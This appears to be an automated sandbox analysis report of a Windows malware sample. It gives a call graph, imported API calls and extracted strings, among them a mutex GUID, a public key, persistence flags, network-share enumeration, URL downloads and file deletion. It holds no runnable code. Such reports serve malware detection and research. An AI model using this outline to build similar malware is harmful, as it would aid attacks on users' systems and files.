42062->42063 42064 2f98e6 42063->42064 42065 2f4690 59 API calls 42063->42065 42064->42061 42065->42063 42070 2f0bd0 WNetOpenEnumW 42067->42070 42069 2ffd95 SendMessageW 42071 2f0c1c 42070->42071 42072 2f0c33 GlobalAlloc 42070->42072 42071->42069 42077 2f0c45 _memset 42072->42077 42073 2f0c51 WNetEnumResourceW 42074 2f0ea3 WNetCloseEnum 42073->42074 42073->42077 42074->42069 42075 2f5c10 59 API calls 42075->42077 42076 2f50c0 59 API calls 42076->42077 42077->42073 42077->42075 42077->42076 42078 2f0bd0 59 API calls 42077->42078 42079 2f8fd0 59 API calls 42077->42079 42078->42077 42079->42077 42080->40802 42081->40790 42082->40793 42083->40813 42084->40815 42086 30f7c0 __ftell_nolock 42085->42086 42087 2fe6b6 timeGetTime 42086->42087 42088 303f74 58 API calls 42087->42088 42089 2fe6cc 42088->42089 42155 2ec6a0 RegOpenKeyExW 42089->42155 42092 2fe72e InternetOpenW 42140 2fe6d4 _memset _strstr _wcsstr 42092->42140 42093 2fea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 42093->42140 42094 2fea4c SHGetFolderPathA 42095 2fea67 PathAppendA DeleteFileA 42094->42095 42094->42140 42095->42140 42097 2feada lstrlenA 42097->42140 42098 2f56d0 59 API calls 42098->42140 42099 2f4690 59 API calls 42112 2fe7be _memmove 42099->42112 42100 2fee4d 42102 2eef50 58 API calls 42100->42102 42101 2f5ae0 59 API calls 42101->42140 42107 2fee5d 42102->42107 42103 2f3ff0 59 API calls 42103->42140 42104 2f2900 60 API calls 42104->42140 42106 2feb53 lstrcpyW 42108 2feb74 lstrlenA 42106->42108 42106->42140 42110 2f3ea0 59 API calls 42107->42110 42114 2feeb1 42107->42114 42111 300c62 _malloc 58 API calls 42108->42111 42109 2f59d0 59 API calls 42109->42140 42110->42107 42111->42140 42112->42099 42112->42140 42186 2edd40 73 API calls 4 library calls 42112->42186 42113 2fe8f3 lstrcpyW 42115 2fe943 InternetOpenUrlW InternetReadFile 42113->42115 42113->42140 42116 2eef50 58 API calls 42114->42116 42118 2fe9ec InternetCloseHandle InternetCloseHandle 42115->42118 42119 2fe97c SHGetFolderPathA 42115->42119 42124 2feec1 42116->42124 42117 2feb99 MultiByteToWideChar lstrcpyW 42117->42140 42118->42140 42119->42118 42120 2fe996 PathAppendA 42119->42120 42187 3020b6 42120->42187 42121 2fec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 42121->42140 42123 2fe93c lstrcatW 42123->42115 42124->42124 42127 2f3ea0 59 API calls 42124->42127 42131 2fef12 42124->42131 42125 2febf0 SHGetFolderPathA 42126 2fec17 PathAppendA DeleteFileA 42125->42126 42125->42140 42126->42140 42127->42124 42128 2fe9c4 lstrlenA 42190 302b02 80 API calls 3 library calls 42128->42190 42130 2fecaa lstrlenA 42130->42140 42132 2f3ff0 59 API calls 42131->42132 42134 2fef3a 42132->42134 42135 2f2900 60 API calls 42134->42135 42137 2fef45 lstrcpyW 42135->42137 42136 2fed1f lstrcpyW 42138 2fed43 lstrlenA 42136->42138 42136->42140 42142 2fef6a 42137->42142 42141 300c62 _malloc 58 API calls 42138->42141 42140->42092 42140->42093 42140->42094 42140->42097 42140->42098 42140->42100 42140->42101 42140->42103 42140->42104 42140->42106 42140->42108 42140->42109 42140->42112 42140->42113 42140->42115 42140->42117 42140->42118 42140->42121 42140->42123 42140->42125 42140->42128 42140->42130 42140->42136 42140->42138 42146 2fed68 MultiByteToWideChar lstrcpyW lstrlenW 42140->42146 42149 2fedc3 SHGetFolderPathA 42140->42149 42152 300bed 58 API calls _free 42140->42152 42160 2ec500 SHGetFolderPathA 42140->42160 42180 2f1b10 timeGetTime timeGetTime 42140->42180 42191 303a38 83 API calls 5 library calls 42140->42191 42141->42140 42143 2f3ff0 59 API calls 42142->42143 42144 2fef9f 42143->42144 42145 2f2900 60 API calls 42144->42145 42147 2fefac lstrcpyW 42145->42147 42146->42140 42148 2fedad lstrlenW 42146->42148 42153 2fee44 42147->42153 42148->42140 42148->42153 42149->42140 42151 2fedea PathAppendA DeleteFileA 42149->42151 42151->42140 42152->42140 42156 2ec6cc RegQueryValueExW 42155->42156 42157 2ec734 42155->42157 42158 2ec70c RegSetValueExW RegCloseKey 42156->42158 42159 2ec6fd RegCloseKey 42156->42159 42157->42140 42158->42157 42159->42140 42161 2ec52c PathAppendA 42160->42161 42162 2ec525 42160->42162 42163 3020b6 125 API calls 42161->42163 42162->42140 42164 2ec550 42163->42164 42165 2ec559 42164->42165 42192 30387f 85 API calls 5 library calls 42164->42192 42165->42140 42167 2ec56c 42193 303455 69 API calls 4 library calls 42167->42193 42169 2ec572 42194 300cf4 84 API calls 6 library calls 42169->42194 42171 2ec57a 42172 2ec5a5 42171->42172 42174 2ec589 42171->42174 42197 303a38 83 API calls 5 library calls 42172->42197 42195 3022f5 74 API calls __fread_nolock 42174->42195 42175 2ec5ab 42175->42140 42177 2ec593 42196 303a38 83 API calls 5 library calls 42177->42196 42179 2ec599 42179->42140 42181 2f1b2f 42180->42181 42182 2f1b7f 42180->42182 42181->42182 42183 2f1b40 PeekMessageW 42181->42183 42185 2f1b58 DispatchMessageW PeekMessageW 42181->42185 42182->42140 42183->42181 42184 2f1b70 Sleep timeGetTime 42183->42184 42184->42182 42184->42183 42185->42181 42185->42184 42186->42112 42198 301ff2 42187->42198 42189 3020c6 42189->42140 42190->42140 42191->42140 42192->42167 42193->42169 42194->42171 42195->42177 42196->42179 42197->42175 42201 301ffe _raise 42198->42201 42199 302010 42200 305208 __wopenfile 58 API calls 42199->42200 42203 302015 42200->42203 42201->42199 42202 30203d 42201->42202 42204 308df4 __getstream 61 API calls 42202->42204 42234 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 42203->42234 42206 302042 42204->42206 42207 302058 42206->42207 42208 30204b 42206->42208 42210 302081 42207->42210 42211 302061 42207->42211 42209 305208 __wopenfile 58 API calls 42208->42209 42216 302020 _raise @_EH4_CallFilterFunc@8 42209->42216 42217 30b078 42210->42217 42212 305208 __wopenfile 58 API calls 42211->42212 42212->42216 42216->42189 42225 30b095 42217->42225 42218 30b0a9 42219 305208 __wopenfile 58 API calls 42218->42219 42220 30b0ae 42219->42220 42239 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 42220->42239 42222 30b2ac 42236 31fba6 42222->42236 42223 30208c 42235 3020ae LeaveCriticalSection LeaveCriticalSection _ungetc 42223->42235 42225->42218 42233 30b250 42225->42233 42240 31fbc4 58 API calls __mbsnbcmp_l 42225->42240 42227 30b216 42227->42218 42241 31fcf3 65 API calls __mbsnbicmp_l 42227->42241 42229 30b249 42229->42233 42242 31fcf3 65 API calls __mbsnbicmp_l 42229->42242 42231 30b268 42231->42233 42243 31fcf3 65 API calls __mbsnbicmp_l 42231->42243 42233->42218 42233->42222 42234->42216 42235->42216 42244 31fa8f 42236->42244 42238 31fbbf 42238->42223 42239->42223 42240->42227 42241->42229 42242->42231 42243->42233 42247 31fa9b _raise 42244->42247 42245 31fab1 42246 305208 __wopenfile 58 API calls 42245->42246 42248 31fab6 42246->42248 42247->42245 42249 31fae7 42247->42249 42262 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 42248->42262 42255 31fb58 42249->42255 42254 31fac0 _raise 42254->42238 42264 307970 42255->42264 42258 31fb03 42263 31fb2c LeaveCriticalSection __unlock_fhandle 42258->42263 42259 31bac1 __wsopen_nolock 109 API calls 42260 31fb92 42259->42260 42261 300bed _free 58 API calls 42260->42261 42261->42258 42262->42254 42263->42254 42265 307993 42264->42265 42266 30797d 42264->42266 42265->42266 42267 30799a ___crtIsPackagedApp 42265->42267 42268 305208 __wopenfile 58 API calls 42266->42268 42271 3079b0 MultiByteToWideChar 42267->42271 42272 3079a3 AreFileApisANSI 42267->42272 42269 307982 42268->42269 42285 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 42269->42285 42274 3079ca GetLastError 42271->42274 42275 3079db 42271->42275 42272->42271 42273 3079ad 42272->42273 42273->42271 42286 3051e7 58 API calls 3 library calls 42274->42286 42277 308cde __malloc_crt 58 API calls 42275->42277 42278 3079e3 42277->42278 42279 3079ea MultiByteToWideChar 42278->42279 42284 30798c 42278->42284 42280 307a00 GetLastError 42279->42280 42279->42284 42287 3051e7 58 API calls 3 library calls 42280->42287 42282 307a0c 42283 300bed _free 58 API calls 42282->42283 42283->42284 42284->42258 42284->42259 42285->42284 42286->42284 42287->42282 42288 361920 42289 30f7c0 __ftell_nolock 42288->42289 42290 361943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 42289->42290 42291 3619e2 GetProcAddress GetProcAddress 42290->42291 42292 361a0b 42290->42292 42291->42292 42293 361aab 42292->42293 42296 361a1b NetStatisticsGet 42292->42296 42294 361ac4 FreeLibrary 42293->42294 42295 361acb 42293->42295 42294->42295 42297 361ad5 GetProcAddress GetProcAddress GetProcAddress 42295->42297 42323 361b0d __ftell_nolock 42295->42323 42298 361a33 __ftell_nolock 42296->42298 42299 361a69 NetStatisticsGet 42296->42299 42297->42323 42303 33d550 101 API calls 42298->42303 42299->42293 42300 361a87 __ftell_nolock 42299->42300 42304 33d550 101 API calls 42300->42304 42301 361c14 FreeLibrary 42302 361c1b 42301->42302 42305 361c24 42302->42305 42306 361c31 LoadLibraryA 42302->42306 42307 361a5a 42303->42307 42304->42293 42388 3349a0 13 API calls 4 library calls 42305->42388 42309 361c4a GetProcAddress GetProcAddress GetProcAddress 42306->42309 42310 361d4b 42306->42310 42307->42299 42314 361cac __ftell_nolock 42309->42314 42320 361c84 __ftell_nolock 42309->42320 42312 36223f 42310->42312 42313 361d59 12 API calls 42310->42313 42311 361c29 42311->42306 42311->42310 42376 362470 42312->42376 42316 362233 FreeLibrary 42313->42316 42327 361e5c 42313->42327 42325 361d03 __ftell_nolock 42314->42325 42332 33d550 101 API calls 42314->42332 42316->42312 42318 361d3f FreeLibrary 42318->42310 42319 36225b __ftell_nolock 42321 33d550 101 API calls 42319->42321 42322 33d550 101 API calls 42320->42322 42324 362276 GetCurrentProcessId 42321->42324 42322->42314 42326 361bee 42323->42326 42329 33d550 101 API calls 42323->42329 42333 361b7c __ftell_nolock 42323->42333 42328 36228f __ftell_nolock 42324->42328 42325->42318 42330 33d550 101 API calls 42325->42330 42326->42301 42326->42302 42327->42316 42337 361ed9 CreateToolhelp32Snapshot 42327->42337 42334 33d550 101 API calls 42328->42334 42329->42333 42331 361d3c 42330->42331 42331->42318 42332->42325 42333->42326 42335 33d550 101 API calls 42333->42335 42336 3622aa 42334->42336 42335->42326 42338 30a77e __atoldbl_l 6 API calls 42336->42338 42337->42316 42339 361ef0 42337->42339 42340 3622ca 42338->42340 42341 361f15 Heap32ListFirst 42339->42341 42342 361f03 GetTickCount 42339->42342 42343 362081 42341->42343 42353 361f28 __ftell_nolock 42341->42353 42342->42341 42344 362095 GetTickCount 42343->42344 42345 36209d Process32First 42343->42345 42344->42345 42346 36210a 42345->42346 42352 3620b4 __ftell_nolock 42345->42352 42347 362118 GetTickCount 42346->42347 42361 362120 __ftell_nolock 42346->42361 42347->42361 42349 361f56 Heap32First 42349->42353 42350 33d550 101 API calls 42350->42352 42351 362196 42354 3621a4 GetTickCount 42351->42354 42367 3621ac __ftell_nolock 42351->42367 42352->42346 42352->42350 42360 3620fb GetTickCount 42352->42360 42353->42343 42355 36204e Heap32ListNext 42353->42355 42356 362066 GetTickCount 42353->42356 42359 33d550 101 API calls 42353->42359 42366 361ff1 GetTickCount 42353->42366 42370 33d550 42353->42370 42354->42367 42355->42343 42355->42353 42356->42343 42356->42353 42357 362219 42363 36222d CloseHandle 42357->42363 42364 362229 42357->42364 42358 33d550 101 API calls 42358->42361 42362 361fd9 Heap32Next 42359->42362 42360->42346 42360->42352 42361->42351 42361->42358 42368 362187 GetTickCount 42361->42368 42362->42353 42363->42316 42364->42316 42365 33d550 101 API calls 42365->42367 42366->42353 42367->42357 42367->42365 42369 36220a GetTickCount 42367->42369 42368->42351 42368->42361 42369->42357 42369->42367 42371 33d559 42370->42371 42374 33d57d __ftell_nolock 42370->42374 42389 34b5d0 101 API calls __except_handler4 42371->42389 42373 33d55f 42373->42374 42390 33a5e0 101 API calls __except_handler4 42373->42390 42374->42349 42377 36247a __ftell_nolock 42376->42377 42378 3624c3 GetTickCount 42377->42378 42379 362483 QueryPerformanceCounter 42377->42379 42382 3624d6 __ftell_nolock 42378->42382 42380 362492 42379->42380 42381 362499 __ftell_nolock 42379->42381 42380->42378 42384 33d550 101 API calls 42381->42384 42383 33d550 101 API calls 42382->42383 42385 3624ea 42383->42385 42386 3624b7 42384->42386 42387 362244 GlobalMemoryStatus 42385->42387 42386->42378 42386->42387 42387->42319 42388->42311 42389->42373 42390->42374 42391 2fbae0 42392 2fbb13 42391->42392 42393 2fbba0 42391->42393 42396 2fbb15 42392->42396 42397 2fbb54 42392->42397 42394 2fbf3d 42393->42394 42395 2fbbad 42393->42395 42403 2fbf9a DefWindowProcW 42394->42403 42404 2fbf65 IsWindow 42394->42404 42398 2fbbd7 42395->42398 42399 2fbbb0 DefWindowProcW 42395->42399 42400 2fbb1c 42396->42400 42401 2fbb47 PostQuitMessage 42396->42401 42402 2fbb70 42397->42402 42405 2fbb75 DefWindowProcW 42397->42405 42406 300c62 _malloc 58 API calls 42398->42406 42400->42399 42400->42402 42409 2fbb2e 42400->42409 42401->42402 42404->42402 42407 2fbf73 DestroyWindow 42404->42407 42408 2fbbe9 GetComputerNameW 42406->42408 42407->42402 42410 2f3100 59 API calls 42408->42410 42409->42402 42412 2f1cd0 92 API calls 42409->42412 42411 2fbc26 42410->42411 42430 2fce80 59 API calls _memmove 42411->42430 42414 2fbb3f 42412->42414 42414->42404 42415 2fbc3a 42416 300bed _free 58 API calls 42415->42416 42429 2fbcdc 42416->42429 42417 2fbefb IsWindow 42418 2fbf28 42417->42418 42419 2fbf11 42417->42419 42418->42402 42419->42418 42420 2fbf1a DestroyWindow 42419->42420 42420->42418 42421 2fbef7 42421->42417 42421->42418 42422 2f4690 59 API calls 42422->42429 42424 2fc330 59 API calls 42424->42429 42425 2fc240 59 API calls 42425->42429 42426 2fb8b0 59 API calls 42426->42429 42428 2fbe8f CreateThread 42428->42429 42429->42417 42429->42421 42429->42422 42429->42424 42429->42425 42429->42426 42429->42428 42431 2eeff0 65 API calls 42429->42431 42432 2fce80 59 API calls _memmove 42429->42432 42430->42415 42431->42429 42432->42429

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 002F9F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002ECF10: _memset.LIBCMT ref: 002ECF4A
                                                                                                                                                                          • Part of subcall function 002ECF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 002ECF5F
                                                                                                                                                                          • Part of subcall function 002ECF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002ECFA6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 002F9FC4
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F9FD2
                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 002F9FDA
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F9FE4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,009F3A70,?), ref: 002FA0BB
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002FA0C2
                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 002FA161
                                                                                                                                                                          • Part of subcall function 002F24E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 002F24FE
                                                                                                                                                                          • Part of subcall function 002F24E0: GetLastError.KERNEL32 ref: 002F2509
                                                                                                                                                                          • Part of subcall function 002F24E0: CloseHandle.KERNEL32 ref: 002F251C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1>$list<T> too long$x*>$x2?${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7>
                                                                                                                                                                        • API String ID: 2957410896-3874714121
                                                                                                                                                                        • Opcode ID: 714c07abc621400f71a5dd77d0e3abd255f1a16312d450a65e1db554de6bc851
                                                                                                                                                                        • Instruction ID: 620835e5b5a52efa9e73d2e06e67affa66a932c8a8b481f3feb271e8fb9acc3b
                                                                                                                                                                        • Opcode Fuzzy Hash: 714c07abc621400f71a5dd77d0e3abd255f1a16312d450a65e1db554de6bc851
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AD2E3705243499BD715EF20C855BABF7E8BF85344F00093CF68997292DB71AA28CF92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00361920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 606 361920-3619e0 call 30f7c0 GetVersionExA LoadLibraryA * 3 609 3619e2-361a05 GetProcAddress * 2 606->609 610 361a0b-361a0d 606->610 609->610 611 361a13-361a15 610->611 612 361aba-361ac2 610->612 611->612 615 361a1b-361a31 NetStatisticsGet 611->615 613 361ac4-361ac5 FreeLibrary 612->613 614 361acb-361ad3 612->614 613->614 616 361ad5-361b0b GetProcAddress * 3 614->616 617 361b0d 614->617 618 361a33-361a5d call 30f7c0 call 33d550 615->618 619 361a69-361a85 NetStatisticsGet 615->619 620 361b0f-361b17 616->620 617->620 618->619 619->612 622 361a87-361aae call 30f7c0 call 33d550 619->622 625 361b1d-361b23 620->625 626 361c0a-361c12 620->626 622->612 625->626 631 361b29-361b2b 625->631 628 361c14-361c15 FreeLibrary 626->628 629 361c1b-361c22 626->629 628->629 633 361c24-361c2b call 3349a0 629->633 634 361c31-361c44 LoadLibraryA 629->634 631->626 636 361b31-361b47 631->636 633->634 640 361d4b-361d53 633->640 639 361c4a-361c82 GetProcAddress * 3 634->639 634->640 648 361b98-361baa 636->648 649 361b49-361b5d 636->649 644 361c84 639->644 645 361caf-361cb7 639->645 642 36223f-362256 call 362470 GlobalMemoryStatus call 30f7c0 640->642 643 361d59-361e56 GetProcAddress * 12 640->643 668 36225b-3622cd call 33d550 GetCurrentProcessId call 30f7c0 call 33d550 call 30a77e 642->668 652 362233-362239 FreeLibrary 643->652 653 361e5c-361e63 643->653 655 361c86-361cac call 30f7c0 call 33d550 644->655 650 361d06-361d08 645->650 651 361cb9-361cc0 645->651 665 361bb2-361bb4 648->665 670 361b5f-361b84 call 30f7c0 call 33d550 649->670 671 361b8a-361b8c 649->671 656 361d3f-361d45 FreeLibrary 650->656 657 361d0a-361d3c call 30f7c0 call 33d550 650->657 658 361cc2-361cc9 651->658 659 361ccb-361ccd 651->659 652->642 653->652 660 361e69-361e70 653->660 655->645 656->640 657->656 658->650 658->659 659->650 664 361ccf-361cde 659->664 660->652 666 361e76-361e7d 660->666 664->650 685 361ce0-361d03 call 30f7c0 call 33d550 664->685 665->626 673 361bb6-361bca 665->673 666->652 667 361e83-361e8a 666->667 667->652 674 361e90-361e97 667->674 670->671 671->648 687 361bfc-361bfe 673->687 688 361bcc-361bf6 call 30f7c0 call 33d550 673->688 674->652 680 361e9d-361ea4 674->680 680->652 689 361eaa-361eb1 680->689 685->650 687->626 688->687 689->652 695 361eb7-361ebe 689->695 695->652 702 361ec4-361ecb 695->702 702->652 706 361ed1-361ed3 702->706 706->652 709 361ed9-361eea CreateToolhelp32Snapshot 706->709 709->652 711 361ef0-361f01 709->711 713 361f15-361f22 Heap32ListFirst 711->713 714 361f03-361f0f GetTickCount 711->714 715 362081-362093 713->715 716 361f28-361f2d 713->716 714->713 717 362095-362097 GetTickCount 715->717 718 36209d-3620b2 Process32First 715->718 719 361f33-361f9d call 30f7c0 call 33d550 Heap32First 716->719 717->718 720 3620b4-3620f5 call 30f7c0 call 33d550 718->720 721 36210a-362116 718->721 734 362015-362060 Heap32ListNext 719->734 735 361f9f-361faa 719->735 720->721 748 3620f7-3620f9 720->748 724 362120-362135 721->724 725 362118-36211a GetTickCount 721->725 732 362196-3621a2 724->732 733 362137 724->733 725->724 739 3621a4-3621a6 GetTickCount 732->739 740 3621ac-3621c1 732->740 737 362140-362181 call 30f7c0 call 33d550 733->737 734->715 745 362062-362064 734->745 738 361fb0-361feb call 30f7c0 call 33d550 Heap32Next 735->738 737->732 771 362183-362185 737->771 763 36200f 738->763 764 361fed-361fef 738->764 739->740 752 3621c3-362204 call 30f7c0 call 33d550 740->752 753 362219-362227 740->753 749 362066-362077 GetTickCount 745->749 750 362079-36207b 745->750 748->720 756 3620fb-362108 GetTickCount 748->756 749->715 749->750 750->715 750->719 752->753 774 362206-362208 752->774 760 36222d CloseHandle 753->760 761 362229-36222b 753->761 756->720 756->721 760->652 761->652 763->734 767 362004-36200d 764->767 768 361ff1-362002 GetTickCount 764->768 767->738 767->763 768->763 768->767 771->737 772 362187-362194 GetTickCount 771->772 772->732 772->737 774->752 775 36220a-362217 GetTickCount 774->775 775->752 775->753
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00361983
                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00361994
                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 003619A1
                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 003619AE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 003619E8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 003619FB
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00361A2D
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00361A81
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00361AC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00361ADB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00361AEE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00361B01
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00361C15
                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00361C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00361C50
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00361C63
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00361C76
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00361D45
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00361D73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00361D86
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00361D99
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00361DAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00361DBF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00361DD2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00361DE5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00361DF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00361E0B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00361E1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00361E31
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00361E44
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00361EDD
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00361F03
                                                                                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00361F1A
                                                                                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00361F95
                                                                                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,662B6C70), ref: 00361FE3
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00361FF1
                                                                                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00362058
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362066
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362095
                                                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 003620AA
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 003620FB
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362118
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00362187
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 003621A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
